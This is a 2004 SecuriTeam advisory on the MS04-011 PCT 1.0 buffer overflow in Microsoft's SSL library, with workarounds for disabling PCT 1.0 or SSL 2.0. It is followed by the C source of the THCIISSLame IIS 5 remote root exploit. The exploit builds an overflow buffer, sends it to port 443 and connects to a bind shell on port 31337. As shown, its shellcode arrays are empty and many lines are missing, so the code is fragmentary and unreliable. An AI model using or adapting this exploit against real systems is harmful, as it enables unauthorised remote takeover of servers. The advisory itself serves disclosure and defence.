[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/22/04

    To: list@securiteam.com
    Date: 22 Apr 2004 12:44:31 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)


    ISS X-Force has discovered a remotely exploitable buffer overflow
    condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
    encryption technology commonly used to secure Web and email
    communications. A buffer overflow condition occurs when processing PCT 1.0
    handshake packets that can lead to remote, privileged compromise of
    affected Windows installations.


    Affected Versions:
     * Microsoft Windows 2000 up to and including SP4
     * Microsoft Windows NT version 4 up to and including SP6a
     * Microsoft Windows XP up to SP1

    Note: The SSL library included in Windows Server 2003 contains the
    vulnerability. However, the PCT 1.0 protocol is disabled by default.

    If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
    protocols are enabled, remote attackers may exploit the buffer overflow
    condition to execute arbitrary code on vulnerable Windows server
    installations. This code would run with local system privileges. The
    protocols necessary for remote exploitation are enabled by default in
    Windows 2000 and Windows NT version 4.

    Common vectors for exploitation might include Internet Information Server
    (IIS), Exchange Server, Active Directory, and potentially any software
    making use of the Microsoft SSL library including unlisted third-party

    The severity of this vulnerability is compounded by the fact that SSL is
    most often used to secure communications involving confidential or
    valuable financial information, and that firewalls and packet filtering
    alone will not be able to stop attacks: the malicious handshake arrives on
    the same port as legitimate SSL traffic. X-Force believes that hackers will
    aggressively target this vulnerability given the high-value nature of Web
    sites protected by SSL.

    The PCT 1.0 protocol is a legacy protocol that is not required for secure
    SSL communication. The PCT 1.0 protocol can be safely disabled as a
    workaround for the vulnerability described in this advisory. However,
    systems using Microsoft Message Queue (MSMQ) cannot disable PCT 1.0
    without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
    disabled instead to close the vulnerability. Successful exploitation of the
    vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The
    vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.

    Customers are encouraged to immediately evaluate the two scenarios
    described above and select a workaround that best applies to their

    Microsoft has published a Knowledge Base article (187498) that describes
    how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
    3.0. Microsoft Knowledge Base article 187498 is available at the following

    Additional Information:
    Microsoft Security Bulletin MS04-011:

    /* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
    /* */
    /* Bug was found by Internet Security Systems */
    /* Reversing credits of the bug go to Halvar Flake */
    /* */
    /* compile with MS Visual C++ : cl THCIISSLame.c */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
    /* scut, stealth, FtR and Random */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    #pragma comment(lib, "ws2_32.lib")

    #define jumper "\xeb\x0f"
    #define greetings_to_microsoft

    char sslshit[] =

    char shellcode[] =

    void usage();
    void shell(int sock);

    int main(int argc, char *argv[])
      unsigned int i,sock,sock2,addr,rc;
      unsigned char *badbuf,*p;
      unsigned long offset = 0x6741a1cd;
      unsigned long XOR = 0xffffffff;

      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
      printf("tested on Windows 2000 Server german/english SP4\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

      if(argc<2 || argc>2)

      badbuf = malloc(347);

      printf("\n[*] building buffer\n");

      p = badbuf;




      strncat(p,(unsigned char *)&offset,4);


      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
       printf("WSAStartup failed !\n");
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      if ((!hp) && (addr == INADDR_NONE) )
       printf("Unable to resolve %s\n",argv[1]);

      if (!sock)
       printf("socket() error...\n");
      if (hp != NULL)
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
       mytcp.sin_family = AF_INET;


      printf("[*] connecting the target\n");

      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
          printf("[*] Exploit send successfully ! Sleeping a while ....\n");
       printf("\nCan't connect to ssl port 443!\n");
       printf("[*] Trying to get a shell\n\n");
       sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
       mytcp.sin_port = htons(31337);
       rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
         printf("can't connect to port 31337 ;( maybe firewalled ...\n");



    void usage()
     unsigned int a;
     printf("\nUsage: <Host>\n");
     printf("Sample: THCIISSLame\n\n");

    void shell(int sock)
     int l;
     char buf[1024];
     struct timeval time;
     unsigned long ul[2];

     time.tv_sec = 1;
     time.tv_usec = 0;

     while (1)
      ul[0] = 1;
      ul[1] = sock;

      l = select (0, (fd_set *)&ul, NULL, NULL, &time);
      if(l == 1)
       l = recv (sock, buf, sizeof (buf), 0);
       if (l <= 0)
        printf ("bye bye...\n");
      l = write (1, buf, l);
       if (l <= 0)
        printf ("bye bye...\n");
       l = read (0, buf, sizeof (buf));
       if (l <= 0)
        printf("bye bye...\n");
       l = send(sock, buf, l, 0);
       if (l <= 0)
        printf("bye bye...\n");


    The information has been provided by Mark Dowd and Neel Mehta of the ISS

    The exploit has been provided by: <mailto:johncybpk@gmx.net> Johnny
    Cyberpunk of THC

